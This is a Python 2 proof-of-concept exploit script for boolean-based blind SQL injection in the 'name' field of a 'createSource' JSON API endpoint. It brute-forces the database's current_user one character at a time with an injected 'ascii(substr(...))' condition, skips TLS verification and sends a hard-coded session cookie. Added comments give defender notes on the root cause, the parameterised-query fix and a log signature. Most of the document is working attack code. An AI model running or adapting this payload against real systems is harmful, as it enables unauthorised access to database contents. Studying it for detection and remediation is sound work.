# Proof-of-concept for a boolean-based blind SQL injection in the `name` field
# of the JSON body accepted by the `createSource` endpoint (Python 2 syntax).
#
# The script recovers the SQL `current_user` value one character at a time:
# for each position 1..8 and each ASCII code 65..122 it posts a body whose
# `name` carries the condition `ascii(substr(current_user, <pos>, 1)) = <code>`
# and treats the marker 'xxxx' in the response text as "condition was true".
#
# Defender notes:
#   * Root cause is presumably string-built SQL around `name` on the server
#     (not visible here); the fix is bound parameters, not response changes.
#   * A full run is up to 8 * 58 = 464 POSTs that differ only in two integers
#     inside `name`; a burst of requests to this endpoint whose `name`
#     contains `ascii(substr(` is a usable log/WAF signature.
#   * The request carries a session cookie, so the endpoint is presumably only
#     reachable when authenticated -- TODO confirm against the application.
#
# NOTE(review): the listing was flattened onto a single line; the nesting
# below is reconstructed, and placing `print answer` inside the `if` is an
# assumption.
import requests
import json
import warnings
# Silences every Python warning, which also hides the insecure-request warning
# that `verify=False` below would otherwise raise.
warnings.filterwarnings("ignore")

# Target endpoint; host and path segment appear to be redacted placeholders.
url = 'https://1.1.1.1/xx/1.0/apiGateway/createSource'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'}
# Session value is embedded in the script; a real token is a secret and must
# not be published with a PoC.
cookies = {'session': 'aaaaaaaatZSI6eyIgYiI6IllXUnRhVzQ9In19.DYkTeA.9GSxXpaWvW1vSMyUVxCRkXkkgTQ'}
# Accumulates the characters confirmed so far.
answer = ''


# i: 1-based character position passed to substr(); positions 1 through 8.
for i in range(1,9):
    # j: candidate ASCII code, 65 ('A') through 122 ('z').
    for j in range(65, 123):
        # Condition appended to the `name` value; the trailing `--` starts a
        # SQL comment so the rest of the server-side statement is ignored.
        payload = '111\' and ascii(substr(current_user,'+str(i)+',1))='+str(j)+'--+'
        # print payload
        # Request template; "bobac" in `name` is the placeholder that is
        # swapped for the payload below. `timeout` here is a body field, not
        # an HTTP client timeout.
        data = {
            "name": "bobac",
            "type": "1",
            "protocol": "http",
            "method": "POST",
            "url": "www.www.com",
            "port": "80",
            "timeout": 3,
            "params": [{
                "name": "a",
                "changeParam": "true",
                "position": "Parameter Path",
                "type": "string",
                "must": "true",
                "default": "a"
            }]
        }
        # Serialise the template, substitute the placeholder in the JSON text,
        # then parse it back into a dict for `requests` to re-encode.
        json_string = json.dumps(data)
        # print type(json_string)
        new_string = json_string.replace("bobac", payload)
        new_data = json.loads(new_string)
        # print new_data
        # exit(0)
        # verify=False disables TLS certificate validation for this request.
        req = requests.post(url, headers=headers, cookies=cookies, json=new_data, verify=False)
        # print req.text
        # exit(0)
        # 'xxxx' is the (redacted) response marker used as the true/false
        # signal for the injected condition.
        if 'xxxx' in req.text:
            answer += chr(j)
            print answer
print 'current_user is %s' % answer